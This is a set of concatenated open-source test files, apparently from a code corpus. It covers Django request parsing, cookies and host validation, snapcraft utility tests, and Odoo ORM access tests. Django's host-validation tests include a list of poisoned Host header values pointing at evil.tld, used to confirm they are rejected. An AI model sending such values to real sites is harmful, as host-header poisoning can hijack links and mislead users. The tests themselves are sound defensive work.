request = WSGIRequest({'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(repr(request), str_prefix("<WSGIRequest: GET '/'>"))
request = WSGIRequest({'PATH_INFO': '/somepath/', 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
request.GET = {'get-key': 'get-value'}
request.POST = {'post-key': 'post-value'}
request.COOKIES = {'post-key': 'post-value'}
request.META = {'post-key': 'post-value'}
self.assertEqual(repr(request), str_prefix("<WSGIRequest: GET '/somepath/'>"))
self.assertEqual(build_request_repr(request), str_prefix("<WSGIRequest\npath:/somepath/,\nGET:{%(_)s'get-key': %(_)s'get-value'},\nPOST:{%(_)s'post-key': %(_)s'post-value'},\nCOOKIES:{%(_)s'post-key': %(_)s'post-value'},\nMETA:{%(_)s'post-key': %(_)s'post-value'}>"))
self.assertEqual(build_request_repr(request, path_override='/otherpath/', GET_override={'a': 'b'}, POST_override={'c': 'd'}, COOKIES_override={'e': 'f'}, META_override={'g': 'h'}),
str_prefix("<WSGIRequest\npath:/otherpath/,\nGET:{%(_)s'a': %(_)s'b'},\nPOST:{%(_)s'c': %(_)s'd'},\nCOOKIES:{%(_)s'e': %(_)s'f'},\nMETA:{%(_)s'g': %(_)s'h'}>"))
def test_wsgirequest_path_info(self):
def wsgi_str(path_info):
path_info = path_info.encode('utf-8') # Actual URL sent by the browser (bytestring)
if six.PY3:
path_info = path_info.decode('iso-8859-1') # Value in the WSGI environ dict (native string)
return path_info
# Regression for #19468
request = WSGIRequest({'PATH_INFO': wsgi_str("/سلام/"), 'REQUEST_METHOD': 'get', 'wsgi.input': BytesIO(b'')})
self.assertEqual(request.path, "/سلام/")
def test_parse_cookie(self):
self.assertEqual(parse_cookie('invalid@key=true'), {})
def test_httprequest_location(self):
request = HttpRequest()
self.assertEqual(request.build_absolute_uri(location="https://www.example.com/asdf"),
'https://www.example.com/asdf')
request.get_host = lambda: 'www.example.com'
request.path = ''
self.assertEqual(request.build_absolute_uri(location="/path/with:colons"),
'http://www.example.com/path/with:colons')
def test_near_expiration(self):
"Cookie will expire when an near expiration time is provided"
response = HttpResponse()
# There is a timing weakness in this test; The
# expected result for max-age requires that there be
# a very slight difference between the evaluated expiration
# time, and the time evaluated in set_cookie(). If this
# difference doesn't exist, the cookie time will be
# 1 second larger. To avoid the problem, put in a quick sleep,
# which guarantees that there will be a time difference.
expires = datetime.utcnow() + timedelta(seconds=10)
time.sleep(0.001)
response.set_cookie('datetime', expires=expires)
datetime_cookie = response.cookies['datetime']
self.assertEqual(datetime_cookie['max-age'], 10)
def test_aware_expiration(self):
"Cookie accepts an aware datetime as expiration time"
response = HttpResponse()
expires = (datetime.utcnow() + timedelta(seconds=10)).replace(tzinfo=utc)
time.sleep(0.001)
response.set_cookie('datetime', expires=expires)
datetime_cookie = response.cookies['datetime']
self.assertEqual(datetime_cookie['max-age'], 10)
def test_far_expiration(self):
"Cookie will expire when an distant expiration time is provided"
response = HttpResponse()
response.set_cookie('datetime', expires=datetime(2028, 1, 1, 4, 5, 6))
datetime_cookie = response.cookies['datetime']
self.assertIn(
datetime_cookie['expires'],
# Slight time dependency; refs #23450
('Sat, 01-Jan-2028 04:05:06 GMT', 'Sat, 01-Jan-2028 04:05:07 GMT')
)
def test_max_age_expiration(self):
"Cookie will expire if max_age is provided"
response = HttpResponse()
response.set_cookie('max_age', max_age=10)
max_age_cookie = response.cookies['max_age']
self.assertEqual(max_age_cookie['max-age'], 10)
self.assertEqual(max_age_cookie['expires'], cookie_date(time.time() + 10))
def test_httponly_cookie(self):
response = HttpResponse()
response.set_cookie('example', httponly=True)
example_cookie = response.cookies['example']
# A compat cookie may be in use -- check that it has worked
# both as an output string, and using the cookie attributes
self.assertIn('; %s' % http_cookies.Morsel._reserved['httponly'], str(example_cookie))
self.assertTrue(example_cookie['httponly'])
def test_unicode_cookie(self):
"Verify HttpResponse.set_cookie() works with unicode data."
response = HttpResponse()
cookie_value = '清風'
response.set_cookie('test', cookie_value)
self.assertEqual(force_str(cookie_value), response.cookies['test'].value)
def test_limited_stream(self):
# Read all of a limited stream
stream = LimitedStream(BytesIO(b'test'), 2)
self.assertEqual(stream.read(), b'te')
# Reading again returns nothing.
self.assertEqual(stream.read(), b'')
# Read a number of characters greater than the stream has to offer
stream = LimitedStream(BytesIO(b'test'), 2)
self.assertEqual(stream.read(5), b'te')
# Reading again returns nothing.
self.assertEqual(stream.readline(5), b'')
# Read sequentially from a stream
stream = LimitedStream(BytesIO(b'12345678'), 8)
self.assertEqual(stream.read(5), b'12345')
self.assertEqual(stream.read(5), b'678')
# Reading again returns nothing.
self.assertEqual(stream.readline(5), b'')
# Read lines from a stream
stream = LimitedStream(BytesIO(b'1234\n5678\nabcd\nefgh\nijkl'), 24)
# Read a full line, unconditionally
self.assertEqual(stream.readline(), b'1234\n')
# Read a number of characters less than a line
self.assertEqual(stream.readline(2), b'56')
# Read the rest of the partial line
self.assertEqual(stream.readline(), b'78\n')
# Read a full line, with a character limit greater than the line length
self.assertEqual(stream.readline(6), b'abcd\n')
# Read the next line, deliberately terminated at the line end
self.assertEqual(stream.readline(4), b'efgh')
# Read the next line... just the line end
self.assertEqual(stream.readline(), b'\n')
# Read everything else.
self.assertEqual(stream.readline(), b'ijkl')
# Regression for #15018
# If a stream contains a newline, but the provided length
# is less than the number of provided characters, the newline
# doesn't reset the available character count
stream = LimitedStream(BytesIO(b'1234\nabcdef'), 9)
self.assertEqual(stream.readline(10), b'1234\n')
self.assertEqual(stream.readline(3), b'abc')
# Now expire the available characters
self.assertEqual(stream.readline(3), b'd')
# Reading again returns nothing.
self.assertEqual(stream.readline(2), b'')
# Same test, but with read, not readline.
stream = LimitedStream(BytesIO(b'1234\nabcdef'), 9)
self.assertEqual(stream.read(6), b'1234\na')
self.assertEqual(stream.read(2), b'bc')
self.assertEqual(stream.read(2), b'd')
self.assertEqual(stream.read(2), b'')
self.assertEqual(stream.read(), b'')
def test_stream(self):
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.read(), b'name=value')
def test_read_after_value(self):
"""
Reading from request is allowed after accessing request contents as
POST or body.
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.POST, {'name': ['value']})
self.assertEqual(request.body, b'name=value')
self.assertEqual(request.read(), b'name=value')
def test_value_after_read(self):
"""
Construction of POST or body is not allowed after reading
from request.
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.read(2), b'na')
self.assertRaises(RawPostDataException, lambda: request.body)
self.assertEqual(request.POST, {})
def test_non_ascii_POST(self):
payload = FakePayload(urlencode({'key': 'España'}))
request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_LENGTH': len(payload),
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'wsgi.input': payload,
})
self.assertEqual(request.POST, {'key': ['España']})
def test_alternate_charset_POST(self):
"""
Test a POST with non-utf-8 payload encoding.
"""
payload = FakePayload(original_urlencode({'key': 'España'.encode('latin-1')}))
request = WSGIRequest({
'REQUEST_METHOD': 'POST',
'CONTENT_LENGTH': len(payload),
'CONTENT_TYPE': 'application/x-www-form-urlencoded; charset=iso-8859-1',
'wsgi.input': payload,
})
self.assertEqual(request.POST, {'key': ['España']})
def test_body_after_POST_multipart_form_data(self):
"""
Reading body after parsing multipart/form-data is not allowed
"""
# Because multipart is used for large amounts of data i.e. file uploads,
# we don't want the data held in memory twice, and we don't want to
# silence the error by setting body = '' either.
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
'']))
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.POST, {'name': ['value']})
self.assertRaises(RawPostDataException, lambda: request.body)
def test_body_after_POST_multipart_related(self):
"""
Reading body after parsing multipart that isn't form-data is allowed
"""
# Ticket #9054
# There are cases in which the multipart data is related instead of
# being a binary upload, in which case it should still be accessible
# via body.
payload_data = b"\r\n".join([
b'--boundary',
b'Content-ID: id; name="name"',
b'',
b'value',
b'--boundary--'
b''])
payload = FakePayload(payload_data)
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/related; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(request.POST, {})
self.assertEqual(request.body, payload_data)
def test_POST_multipart_with_content_length_zero(self):
"""
Multipart POST requests with Content-Length >= 0 are valid and need to be handled.
"""
# According to:
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13
# Every request.POST with Content-Length >= 0 is a valid request,
# this test ensures that we handle Content-Length == 0.
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
'']))
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': 0,
'wsgi.input': payload})
self.assertEqual(request.POST, {})
def test_POST_binary_only(self):
payload = b'\r\n\x01\x00\x00\x00ab\x00\x00\xcd\xcc,@'
environ = {'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/octet-stream',
'CONTENT_LENGTH': len(payload),
'wsgi.input': BytesIO(payload)}
request = WSGIRequest(environ)
self.assertEqual(request.POST, {})
self.assertEqual(request.FILES, {})
self.assertEqual(request.body, payload)
# Same test without specifying content-type
environ.update({'CONTENT_TYPE': '', 'wsgi.input': BytesIO(payload)})
request = WSGIRequest(environ)
self.assertEqual(request.POST, {})
self.assertEqual(request.FILES, {})
self.assertEqual(request.body, payload)
def test_read_by_lines(self):
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
self.assertEqual(list(request), [b'name=value'])
def test_POST_after_body_read(self):
"""
POST should be populated even if body is read first
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
request.body # evaluate
self.assertEqual(request.POST, {'name': ['value']})
def test_POST_after_body_read_and_stream_read(self):
"""
POST should be populated even if body is read first, and then
the stream is read second.
"""
payload = FakePayload('name=value')
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
request.body # evaluate
self.assertEqual(request.read(1), b'n')
self.assertEqual(request.POST, {'name': ['value']})
def test_POST_after_body_read_and_stream_read_multipart(self):
"""
POST should be populated even if body is read first, and then
the stream is read second. Using multipart/form-data instead of urlencoded.
"""
payload = FakePayload("\r\n".join([
'--boundary',
'Content-Disposition: form-data; name="name"',
'',
'value',
'--boundary--'
'']))
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=boundary',
'CONTENT_LENGTH': len(payload),
'wsgi.input': payload})
request.body # evaluate
# Consume enough data to mess up the parsing:
self.assertEqual(request.read(13), b'--boundary\r\nC')
self.assertEqual(request.POST, {'name': ['value']})
def test_POST_connection_error(self):
"""
If wsgi.input.read() raises an exception while trying to read() the
POST, the exception should be identifiable (not a generic IOError).
"""
class ExplodingBytesIO(BytesIO):
def read(self, len=0):
raise IOError("kaboom!")
payload = b'name=value'
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'CONTENT_LENGTH': len(payload),
'wsgi.input': ExplodingBytesIO(payload)})
with self.assertRaises(UnreadablePostError):
request.body
def test_FILES_connection_error(self):
"""
If wsgi.input.read() raises an exception while trying to read() the
FILES, the exception should be identifiable (not a generic IOError).
"""
class ExplodingBytesIO(BytesIO):
def read(self, len=0):
raise IOError("kaboom!")
payload = b'x'
request = WSGIRequest({'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': 'multipart/form-data; boundary=foo_',
'CONTENT_LENGTH': len(payload),
'wsgi.input': ExplodingBytesIO(payload)})
with self.assertRaises(UnreadablePostError):
request.FILES
class HostValidationTests(SimpleTestCase):
poisoned_hosts = [
'example.com@evil.tld',
'example.com:dr.frankenstein@evil.tld',
'example.com:dr.frankenstein@evil.tld:80',
'example.com:80/badpath',
'example.com: recovermypassword.com',
]
@override_settings(
USE_X_FORWARDED_HOST=False,
ALLOWED_HOSTS=[
'forward.com', 'example.com', 'internal.com', '12.34.56.78',
'[2001:19f0:feee::dead:beef:cafe]', 'xn--4ca9at.com',
'.multitenant.com', 'INSENSITIVE.com',
])
def test_http_get_host(self):
# Check if X_FORWARDED_HOST is provided.
request = HttpRequest()
request.META = {
'HTTP_X_FORWARDED_HOST': 'forward.com',
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
# X_FORWARDED_HOST is ignored.
self.assertEqual(request.get_host(), 'example.com')
# Check if X_FORWARDED_HOST isn't provided.
request = HttpRequest()
request.META = {
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'example.com')
# Check if HTTP_HOST isn't provided.
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'internal.com')
# Check if HTTP_HOST isn't provided, and we're on a nonstandard port
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 8042,
}
self.assertEqual(request.get_host(), 'internal.com:8042')
legit_hosts = [
'example.com',
'example.com:80',
'12.34.56.78',
'12.34.56.78:443',
'[2001:19f0:feee::dead:beef:cafe]',
'[2001:19f0:feee::dead:beef:cafe]:8080',
'xn--4ca9at.com', # Punnycode for öäü.com
'anything.multitenant.com',
'multitenant.com',
'insensitive.com',
'example.com.',
'example.com.:80',
]
for host in legit_hosts:
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
# Poisoned host headers are rejected as suspicious
for host in chain(self.poisoned_hosts, ['other.com', 'example.com..']):
with self.assertRaises(SuspiciousOperation):
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
@override_settings(USE_X_FORWARDED_HOST=True, ALLOWED_HOSTS=['*'])
def test_http_get_host_with_x_forwarded_host(self):
# Check if X_FORWARDED_HOST is provided.
request = HttpRequest()
request.META = {
'HTTP_X_FORWARDED_HOST': 'forward.com',
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
# X_FORWARDED_HOST is obeyed.
self.assertEqual(request.get_host(), 'forward.com')
# Check if X_FORWARDED_HOST isn't provided.
request = HttpRequest()
request.META = {
'HTTP_HOST': 'example.com',
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'example.com')
# Check if HTTP_HOST isn't provided.
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 80,
}
self.assertEqual(request.get_host(), 'internal.com')
# Check if HTTP_HOST isn't provided, and we're on a nonstandard port
request = HttpRequest()
request.META = {
'SERVER_NAME': 'internal.com',
'SERVER_PORT': 8042,
}
self.assertEqual(request.get_host(), 'internal.com:8042')
# Poisoned host headers are rejected as suspicious
legit_hosts = [
'example.com',
'example.com:80',
'12.34.56.78',
'12.34.56.78:443',
'[2001:19f0:feee::dead:beef:cafe]',
'[2001:19f0:feee::dead:beef:cafe]:8080',
'xn--4ca9at.com', # Punnycode for öäü.com
]
for host in legit_hosts:
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
for host in self.poisoned_hosts:
with self.assertRaises(SuspiciousOperation):
request = HttpRequest()
request.META = {
'HTTP_HOST': host,
}
request.get_host()
@override_settings(DEBUG=True, ALLOWED_HOSTS=[])
def test_host_validation_disabled_in_debug_mode(self):
"""If ALLOWED_HOSTS is empty and DEBUG is True, all hosts pass."""
request = HttpRequest()
request.META = {
'HTTP_HOST': 'example.com',
}
self.assertEqual(request.get_host(), 'example.com')
# Invalid hostnames would normally raise a SuspiciousOperation,
# but we have DEBUG=True, so this check is disabled.
request = HttpRequest()
request.META = {
'HTTP_HOST': "invalid_hostname.com",
}
self.assertEqual(request.get_host(), "invalid_hostname.com")
@override_settings(ALLOWED_HOSTS=[])
def test_get_host_suggestion_of_allowed_host(self):
"""get_host() makes helpful suggestions if a valid-looking host is not in ALLOWED_HOSTS."""
msg_invalid_host = "Invalid HTTP_HOST header: %r."
msg_suggestion = msg_invalid_host + " You may need to add %r to ALLOWED_HOSTS."
msg_suggestion2 = msg_invalid_host + " The domain name provided is not valid according to RFC 1034/1035"
for host in [ # Valid-looking hosts
'example.com',
'12.34.56.78',
'[2001:19f0:feee::dead:beef:cafe]',
'xn--4ca9at.com', # Punnycode for öäü.com
]:
request = HttpRequest()
request.META = {'HTTP_HOST': host}
self.assertRaisesMessage(
SuspiciousOperation,
msg_suggestion % (host, host),
request.get_host
)
for domain, port in [ # Valid-looking hosts with a port number
('example.com', 80),
('12.34.56.78', 443),
('[2001:19f0:feee::dead:beef:cafe]', 8080),
]:
host = '%s:%s' % (domain, port)
request = HttpRequest()
request.META = {'HTTP_HOST': host}
self.assertRaisesMessage(
SuspiciousOperation,
msg_suggestion % (host, domain),
request.get_host
)
for host in self.poisoned_hosts:
request = HttpRequest()
request.META = {'HTTP_HOST': host}
self.assertRaisesMessage(
SuspiciousOperation,
msg_invalid_host % host,
request.get_host
)
request = HttpRequest()
request.META = {'HTTP_HOST': "invalid_hostname.com"}
self.assertRaisesMessage(
SuspiciousOperation,
msg_suggestion2 % "invalid_hostname.com",
request.get_host
)
class BuildAbsoluteURITestCase(SimpleTestCase):
"""
Regression tests for ticket #18314.
"""
def setUp(self):
self.factory = RequestFactory()
def test_build_absolute_uri_no_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when the ``location`` argument is not provided, and ``request.path``
begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(),
'http://testserver//absolute-uri'
)
def test_build_absolute_uri_absolute_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when an absolute URL ``location`` argument is provided, and
``request.path`` begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(location='http://example.com/?foo=bar'),
'http://example.com/?foo=bar'
)
def test_build_absolute_uri_schema_relative_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when a schema-relative URL ``location`` argument is provided, and
``request.path`` begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(location='//example.com/?foo=bar'),
'http://example.com/?foo=bar'
)
def test_build_absolute_uri_relative_location(self):
"""
Ensures that ``request.build_absolute_uri()`` returns the proper value
when a relative URL ``location`` argument is provided, and
``request.path`` begins with //.
"""
# //// is needed to create a request with a path beginning with //
request = self.factory.get('////absolute-uri')
self.assertEqual(
request.build_absolute_uri(location='/foo/bar/'),
'http://testserver/foo/bar/'
)
| mit |
mvo5/snapcraft | tests/unit/test_common.py | 3 | 6507 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015-2018 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import Equals
from snapcraft.internal import common, errors
from tests import unit
class CommonTestCase(unit.TestCase):
def test_set_plugindir(self):
plugindir = os.path.join(self.path, "testplugin")
common.set_plugindir(plugindir)
self.assertThat(plugindir, Equals(common.get_plugindir()))
def test_isurl(self):
self.assertTrue(common.isurl("git://"))
self.assertTrue(common.isurl("bzr://"))
self.assertFalse(common.isurl("./"))
self.assertFalse(common.isurl("/foo"))
self.assertFalse(common.isurl("/fo:o"))
class CommonMigratedTestCase(unit.TestCase):
def test_parallel_build_count_migration_message(self):
raised = self.assertRaises(
errors.PluginOutdatedError, common.get_parallel_build_count
)
self.assertThat(
str(raised), Equals("This plugin is outdated: use 'parallel_build_count'")
)
def test_deb_arch_migration_message(self):
raised = self.assertRaises(errors.PluginOutdatedError, common.get_arch)
self.assertThat(
str(raised), Equals("This plugin is outdated: use 'project.deb_arch'")
)
def test_arch_triplet_migration_message(self):
raised = self.assertRaises(errors.PluginOutdatedError, common.get_arch_triplet)
self.assertThat(
str(raised), Equals("This plugin is outdated: use 'project.arch_triplet'")
)
class FormatInColumnsTestCase(unit.TestCase):
elements_list = [
"ant",
"autotools",
"catkin",
"cmake",
"copy",
"go",
"jdk",
"kbuild",
"kernel",
"make",
"maven",
"nil",
"nodejs",
"python2",
"python3",
"scons",
"tar-content",
]
def test_format_output_in_columns_default(self):
"""Format output on 2 lines, with default max-width and space sep"""
expected = [
"ant catkin copy jdk kernel maven "
"nodejs python3 tar-content",
"autotools cmake go kbuild make nil python2 scons ",
]
self.assertThat(
common.format_output_in_columns(self.elements_list), Equals(expected)
)
def test_format_output_in_columns_narrow(self):
"""Format output on 3 lines, with narrow max-width and space sep"""
expected = [
"ant cmake jdk make nodejs scons ",
"autotools copy kbuild maven python2 tar-content",
"catkin go kernel nil python3",
]
self.assertThat(
common.format_output_in_columns(self.elements_list, max_width=60),
Equals(expected),
)
def test_format_output_in_columns_large(self):
"""Format output on one big line, with default space sep"""
expected = [
"ant autotools catkin cmake copy go jdk kbuild "
"kernel make maven nil nodejs python2 python3 "
"scons tar-content"
]
self.assertThat(
common.format_output_in_columns(self.elements_list, max_width=990),
Equals(expected),
)
def test_format_output_in_columns_one_space(self):
"""Format output with one space sep"""
expected = [
"ant cmake jdk make nodejs scons ",
"autotools copy kbuild maven python2 tar-content",
"catkin go kernel nil python3",
]
self.assertThat(
common.format_output_in_columns(
self.elements_list, max_width=60, num_col_spaces=1
),
Equals(expected),
)
class FormatSnapFileNameTest(unit.TestCase):
scenarios = [
(
"all info",
dict(
snap=dict(name="name", version="version", architectures=["amd64"]),
expected="name_version_amd64.snap",
),
),
(
"missing version",
dict(
snap=dict(name="name", architectures=["amd64"]),
allow_empty_version=True,
expected="name_amd64.snap",
),
),
(
"no arch",
dict(
snap=dict(name="name", version="version"),
expected="name_version_all.snap",
),
),
(
"multi",
dict(
snap=dict(
name="name", version="version", architectures=["amd64", "i386"]
),
expected="name_version_multi.snap",
),
),
(
"pack",
dict(
snap=dict(name="name", version="version", arch=["amd64"]),
expected="name_version_amd64.snap",
),
),
(
"pack multi",
dict(
snap=dict(name="name", version="version", arch=["amd64", "i386"]),
expected="name_version_multi.snap",
),
),
]
def test_filename(self):
if hasattr(self, "allow_empty_version"):
snap_name = common.format_snap_name(
self.snap, allow_empty_version=self.allow_empty_version
)
else:
snap_name = common.format_snap_name(self.snap)
self.assertThat(snap_name, Equals(self.expected))
class FormatSnapFileNameErrorTest(unit.TestCase):
def test_version_missing_and_not_allowed_is_error(self):
# This is to not experience unexpected results given the
# fact that version is not allowed.
snap = dict(name="name")
self.assertRaises(KeyError, common.format_snap_name, snap)
| gpl-3.0 |
avoinsystems/odoo | openerp/addons/base/tests/test_orm.py | 149 | 18110 | from collections import defaultdict
from openerp.tools import mute_logger
from openerp.tests import common
UID = common.ADMIN_USER_ID
class TestORM(common.TransactionCase):
""" test special behaviors of ORM CRUD functions
TODO: use real Exceptions types instead of Exception """
def setUp(self):
super(TestORM, self).setUp()
cr, uid = self.cr, self.uid
self.partner = self.registry('res.partner')
self.users = self.registry('res.users')
self.p1 = self.partner.name_create(cr, uid, 'W')[0]
self.p2 = self.partner.name_create(cr, uid, 'Y')[0]
self.ir_rule = self.registry('ir.rule')
# sample unprivileged user
employee_gid = self.ref('base.group_user')
self.uid2 = self.users.create(cr, uid, {'name': 'test user', 'login': 'test', 'groups_id': [4,employee_gid]})
@mute_logger('openerp.models')
def testAccessDeletedRecords(self):
""" Verify that accessing deleted records works as expected """
cr, uid, uid2, p1, p2 = self.cr, self.uid, self.uid2, self.p1, self.p2
self.partner.unlink(cr, uid, [p1])
# read() is expected to skip deleted records because our API is not
# transactional for a sequence of search()->read() performed from the
# client-side... a concurrent deletion could therefore cause spurious
# exceptions even when simply opening a list view!
# /!\ Using unprileged user to detect former side effects of ir.rules!
self.assertEqual([{'id': p2, 'name': 'Y'}], self.partner.read(cr, uid2, [p1,p2], ['name']), "read() should skip deleted records")
self.assertEqual([], self.partner.read(cr, uid2, [p1], ['name']), "read() should skip deleted records")
# Deleting an already deleted record should be simply ignored
self.assertTrue(self.partner.unlink(cr, uid, [p1]), "Re-deleting should be a no-op")
# Updating an already deleted record should raise, even as admin
with self.assertRaises(Exception):
self.partner.write(cr, uid, [p1], {'name': 'foo'})
@mute_logger('openerp.models')
def testAccessFilteredRecords(self):
""" Verify that accessing filtered records works as expected for non-admin user """
cr, uid, uid2, p1, p2 = self.cr, self.uid, self.uid2, self.p1, self.p2
partner_model = self.registry('ir.model').search(cr, uid, [('model','=','res.partner')])[0]
self.ir_rule.create(cr, uid, {'name': 'Y is invisible',
'domain_force': [('id', '!=', p1)],
'model_id': partner_model})
# search as unprivileged user
partners = self.partner.search(cr, uid2, [])
self.assertFalse(p1 in partners, "W should not be visible...")
self.assertTrue(p2 in partners, "... but Y should be visible")
# read as unprivileged user
with self.assertRaises(Exception):
self.partner.read(cr, uid2, [p1], ['name'])
# write as unprivileged user
with self.assertRaises(Exception):
self.partner.write(cr, uid2, [p1], {'name': 'foo'})
# unlink as unprivileged user
with self.assertRaises(Exception):
self.partner.unlink(cr, uid2, [p1])
# Prepare mixed case
self.partner.unlink(cr, uid, [p2])
# read mixed records: some deleted and some filtered
with self.assertRaises(Exception):
self.partner.read(cr, uid2, [p1,p2], ['name'])
# delete mixed records: some deleted and some filtered
with self.assertRaises(Exception):
self.partner.unlink(cr, uid2, [p1,p2])
def test_multi_read(self):
record_id = self.partner.create(self.cr, UID, {'name': 'MyPartner1'})
records = self.partner.read(self.cr, UID, [record_id])
self.assertIsInstance(records, list)
def test_one_read(self):
record_id = self.partner.create(self.cr, UID, {'name': 'MyPartner1'})
record = self.partner.read(self.cr, UID, record_id)
self.assertIsInstance(record, dict)
@mute_logger('openerp.models')
def test_search_read(self):
# simple search_read
self.partner.create(self.cr, UID, {'name': 'MyPartner1'})
found = self.partner.search_read(self.cr, UID, [['name', '=', 'MyPartner1']], ['name'])
self.assertEqual(len(found), 1)
self.assertEqual(found[0]['name'], 'MyPartner1')
self.assertTrue('id' in found[0])
# search_read correct order
self.partner.create(self.cr, UID, {'name': 'MyPartner2'})
found = self.partner.search_read(self.cr, UID, [['name', 'like', 'MyPartner']], ['name'], order="name")
self.assertEqual(len(found), 2)
self.assertEqual(found[0]['name'], 'MyPartner1')
self.assertEqual(found[1]['name'], 'MyPartner2')
found = self.partner.search_read(self.cr, UID, [['name', 'like', 'MyPartner']], ['name'], order="name desc")
self.assertEqual(len(found), 2)
self.assertEqual(found[0]['name'], 'MyPartner2')
self.assertEqual(found[1]['name'], 'MyPartner1')
# search_read that finds nothing
found = self.partner.search_read(self.cr, UID, [['name', '=', 'Does not exists']], ['name'])
self.assertEqual(len(found), 0)
def test_exists(self):
partner = self.partner.browse(self.cr, UID, [])
# check that records obtained from search exist
recs = partner.search([])
self.assertTrue(recs)
self.assertEqual(recs.exists(), recs)
# check that there is no record with id 0
recs = partner.browse([0])
self.assertFalse(recs.exists())
def test_groupby_date(self):
partners = dict(
A='2012-11-19',
B='2012-12-17',
C='2012-12-31',
D='2013-01-07',
E='2013-01-14',
F='2013-01-28',
G='2013-02-11',
)
all_partners = []
partners_by_day = defaultdict(set)
partners_by_month = defaultdict(set)
partners_by_year = defaultdict(set)
for name, date in partners.items():
p = self.partner.create(self.cr, UID, dict(name=name, date=date))
all_partners.append(p)
partners_by_day[date].add(p)
partners_by_month[date.rsplit('-', 1)[0]].add(p)
partners_by_year[date.split('-', 1)[0]].add(p)
def read_group(interval, domain=None):
main_domain = [('id', 'in', all_partners)]
if domain:
domain = ['&'] + main_domain + domain
else:
domain = main_domain
rg = self.partner.read_group(self.cr, self.uid, domain, ['date'], 'date' + ':' + interval)
result = {}
for r in rg:
result[r['date:' + interval]] = set(self.partner.search(self.cr, self.uid, r['__domain']))
return result
self.assertEqual(len(read_group('day')), len(partners_by_day))
self.assertEqual(len(read_group('month')), len(partners_by_month))
self.assertEqual(len(read_group('year')), len(partners_by_year))
rg = self.partner.read_group(self.cr, self.uid, [('id', 'in', all_partners)],
['date'], ['date:month', 'date:day'], lazy=False)
self.assertEqual(len(rg), len(all_partners))
class TestInherits(common.TransactionCase):
""" test the behavior of the orm for models that use _inherits;
specifically: res.users, that inherits from res.partner
"""
def setUp(self):
